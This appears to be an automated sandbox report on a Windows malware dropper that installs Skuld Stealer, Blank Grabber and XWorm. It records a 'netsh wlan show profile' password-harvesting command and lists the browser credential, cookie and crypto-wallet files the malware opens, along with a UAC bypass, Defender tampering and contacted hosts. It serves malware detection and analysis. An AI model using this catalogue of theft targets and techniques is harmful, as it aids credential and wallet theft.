Request.Header116415321826934814453125582076609134674072265625AllocateAndInitializeSidBuildSecurityDescriptorWAssignProcessToJobObjectGenerateConsoleCtrlEventGetMaximumProcessorCountGetNamedPipeHandleStateWSetConsoleCursorPositionSetDefaultDllDirectoriesNtQuerySystemInformationSetupDiCreateDeviceInfoWSetupDiGetSelectedDeviceSetupDiSetSelectedDevicetracecheckstackownershiphash of unhashable type span has no free objectsruntime: found obj at *(runtime: VirtualFree of /cgo/go-to-c-calls:calls/gc/heap/objects:objects/sched/latencies:secondsqueuefinalizer during GCupdate during transitionruntime: markroot index can't scan our own stackgcDrainN phase incorrectpageAlloc: out of memoryruntime: p.searchAddr = range partially overlapsstack trace unavailable
                        Source: skuld.exe, 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: \Ethereum\keystore%s\extensions-tempreflect.Value.UintGetExitCodeProcesssegmentation faultoperation canceledno child processesconnection refusedRFS specific erroridentifier removedinput/output errormultihop attemptedfile name too longno locks availablestreams pipe errorLookupAccountNameWCreateFileMappingWGetFileAttributesWSetFileAttributesWCommandLineToArgvWunknown _txlock %qnon-minimal lengthtruncated sequencesequence truncatedcannot be negativeexceeded max depthinvalid character in numeric literalcontext.Backgroundunsupported formatbufio: buffer fullhttp: blank cookiereceived from peerFLOW_CONTROL_ERRORframe_goaway_shortproxy-authenticateUNKNOWN_SETTING_%dGo-http-client/2.0Go-http-client/1.1Temporary RedirectPermanent RedirectMethod Not AllowedExpectation Failedbad Content-Lengthfield value for %qIBM Code Page 1047IBM Code Page 1140Macintosh Cyrillicvalue out of range298023223876953125GetPerformanceInfoCM_MapCrToWin32ErrCloseServiceHandleCreateWellKnownSidGetSidSubAuthorityMakeSelfRelativeSDQueryServiceStatusCertGetNameStringWPFXImportCertStoreGetBestInterfaceExClosePseudoConsoleEscapeCommFunctionGetCommModemStatusGetComputerNameExWGetCurrentThreadIdGetModuleFileNameWGetModuleHandleExWGetVolumePathNameWRemoveDllDirectoryTerminateJobObjectWriteProcessMemoryEnumProcessModulesGetModuleBaseNameWreflect.Value.Elemreflect.Value.Typereflect: Zero(nil)adaptivestackstartdontfreezetheworldtraceadvanceperiodtracebackancestorsgarbage collectionsync.RWMutex.RLockGC worker (active)stopping the worldwait until GC endsbad lfnode addresssystem page size (elem align too big but memory size /gc/pauses:seconds because dotdotdotruntime: npages = invalid skip valueruntime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preempt
                        Tries to harvest and steal WLAN passwords
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\favicons.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f463e7a-ef1f-4e71-ae85-88471a72b3d6Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\content-prefs.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-releaseJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\webappsstore.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\ls-archive.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\permissions.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\protections.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.defaultJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
                        Tries to steal Crypto Currency Wallets
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldbJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                        Source: Yara matchFile source: 74.0.SecurityHealthSystray.exe.be0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.skuld.exe.cf0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 54.0.SecurityHealthSystray.exe.be0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 54.2.SecurityHealthSystray.exe.be0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.0.skuld.exe.cf0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 74.2.SecurityHealthSystray.exe.be0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000000.1505357195.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000004A.00000002.1701196379.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000036.00000000.1632827829.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: skuld.exe PID: 3872, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: program.exe PID: 2360, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: SecurityHealthSystray.exe PID: 3948, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: SecurityHealthSystray.exe PID: 7812, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\skuld.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, type: DROPPED

                        Remote Access Functionality

                        barindex
                        Yara detected Blank Grabber
                        Source: Yara matchFile source: 00000008.00000003.1934849918.00000237A5ED6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000003.1524758278.00000139887E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000003.1524758278.00000139887E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1938588123.00000237A4503000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: program.exe PID: 4464, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: program.exe PID: 2360, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI44642\rarreg.key, type: DROPPED
                        Yara detected Skuld Stealer
                        Source: Yara matchFile source: 74.0.SecurityHealthSystray.exe.be0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.skuld.exe.cf0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 54.0.SecurityHealthSystray.exe.be0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 54.2.SecurityHealthSystray.exe.be0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.0.skuld.exe.cf0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 74.2.SecurityHealthSystray.exe.be0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000000.1505357195.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000004A.00000002.1701196379.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000036.00000000.1632827829.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: skuld.exe PID: 3872, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: SecurityHealthSystray.exe PID: 3948, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\skuld.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, type: DROPPED
                        Yara detected Telegram RAT
                        Source: Yara matchFile source: Process Memory Space: program.exe PID: 2360, type: MEMORYSTR
                        Yara detected XWorm
                        Source: Yara matchFile source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.EternalPredictor.exe.3d10cf0.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.0.eternal.exe.bc0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.EternalPredictor.exe.3d22330.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000002.00000000.1499082225.0000000000BC2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1521249404.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: EternalPredictor.exe PID: 2852, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: eternal.exe PID: 5604, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\eternal.exe, type: DROPPED
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA4953DC bind,8_2_00007FFBAA4953DC
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA496424 listen,8_2_00007FFBAA496424

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts341
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		1
                        Abuse Elevation Control Mechanism                        		1
                        File and Directory Permissions Modification                        		1
                        OS Credential Dumping                        		2
                        System Time Discovery                        		Remote Services11
                        Archive Collected Data                        		4
                        Ingress Tool Transfer                        		Exfiltration Over Other Network Medium1
                        Data Encrypted for Impact
                        CredentialsDomainsDefault Accounts2
                        Native API                        		1
                        Windows Service                        		1
                        DLL Side-Loading                        		41
                        Disable or Modify Tools                        		LSASS Memory3
                        File and Directory Discovery                        		Remote Desktop Protocol3
                        Data from Local System                        		11
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts122
                        Command and Scripting Interpreter                        		1
                        Scheduled Task/Job                        		1
                        Windows Service                        		111
                        Deobfuscate/Decode Files or Information                        		Security Account Manager48
                        System Information Discovery                        		SMB/Windows Admin Shares1
                        Clipboard Data                        		1
                        Non-Standard Port                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts1
                        Scheduled Task/Job                        		121
                        Registry Run Keys / Startup Folder                        		111
                        Process Injection                        		1
                        Abuse Elevation Control Mechanism                        		NTDS1
                        Query Registry                        		Distributed Component Object ModelInput Capture4
                        Non-Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud Accounts3
                        PowerShell                        		Network Logon Script1
                        Scheduled Task/Job                        		21
                        Obfuscated Files or Information                        		LSA Secrets471
                        Security Software Discovery                        		SSHKeylogging15
                        Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts121
                        Registry Run Keys / Startup Folder                        		1
                        Install Root Certificate                        		Cached Domain Credentials2
                        Process Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                        Software Packing                        		DCSync261
                        Virtualization/Sandbox Evasion                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        DLL Side-Loading                        		Proc Filesystem1
                        Application Window Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                        Masquerading                        		/etc/passwd and /etc/shadow1
                        Remote System Discovery                        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron2
                        Modify Registry                        		Network Sniffing1
                        System Network Configuration Discovery                        		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd261
                        Virtualization/Sandbox Evasion                        		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                        Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task111
                        Process Injection                        		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1557106 Sample: EternalPredictor.exe Startdate: 17/11/2024 Architecture: WINDOWS Score: 100 117 ip-api.com 2->117 119 api.ipify.org 2->119 121 discord.com 2->121 131 Suricata IDS alerts for network traffic 2->131 133 Found malware configuration 2->133 135 Malicious sample detected (through community Yara rule) 2->135 137 22 other signatures 2->137 12 EternalPredictor.exe 5 2->12         started        15 SecurityHealthSystray.exe 2->15         started        18 XClient.exe 2->18         started        20 XClient.exe 2->20         started        signatures3 process4 file5 109 C:\Users\user\AppData\Roaming\skuld.exe, PE32+ 12->109 dropped 111 C:\Users\user\AppData\Roaming\program.exe, PE32+ 12->111 dropped 113 C:\Users\user\AppData\Roaming\eternal.exe, PE32 12->113 dropped 115 C:\Users\user\...ternalPredictor.exe.log, CSV 12->115 dropped 22 program.exe 22 12->22         started        26 skuld.exe 2 2 12->26         started        29 eternal.exe 1 6 12->29         started        191 Multi AV Scanner detection for dropped file 15->191 193 UAC bypass detected (Fodhelper) 15->193 31 cmd.exe 15->31         started        33 conhost.exe 15->33         started        signatures6 process7 dnsIp8 95 C:\Users\user\AppData\Local\...\rarreg.key, ASCII 22->95 dropped 97 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 22->97 dropped 99 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 22->99 dropped 105 16 other files (none is malicious) 22->105 dropped 153 Multi AV Scanner detection for dropped file 22->153 155 Modifies Windows Defender protection settings 22->155 157 Adds a directory exclusion to Windows Defender 22->157 173 2 other signatures 22->173 35 program.exe 1 108 22->35         started        125 ip-api.com 208.95.112.1, 49707, 49716, 49717 TUT-ASUS United States 26->125 127 api.ipify.org 172.67.74.152, 443, 49706 CLOUDFLARENETUS United States 26->127 101 C:\Users\user\...\SecurityHealthSystray.exe, PE32+ 26->101 dropped 159 Installs new ROOT certificates 26->159 161 Found many strings related to Crypto-Wallets (likely being stolen) 26->161 163 Uses cmd line tools excessively to alter registry or file data 26->163 39 conhost.exe 26->39         started        41 attrib.exe 1 26->41         started        43 attrib.exe 1 26->43         started        45 WMIC.exe 26->45         started        129 147.185.221.23, 33942, 49709, 49712 SALSGIVERUS United States 29->129 103 C:\Users\user\AppData\Roaming\XClient.exe, PE32 29->103 dropped 165 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 29->165 167 Protects its processes via BreakOnTermination flag 29->167 169 Creates multiple autostart registry keys 29->169 171 Uses schtasks.exe or at.exe to add and modify task schedules 29->171 47 schtasks.exe 29->47         started        49 fodhelper.exe 31->49         started        51 fodhelper.exe 31->51         started        53 fodhelper.exe 31->53         started        file9 signatures10 process11 dnsIp12 123 discord.com 162.159.128.233, 443, 49718 CLOUDFLARENETUS United States 35->123 139 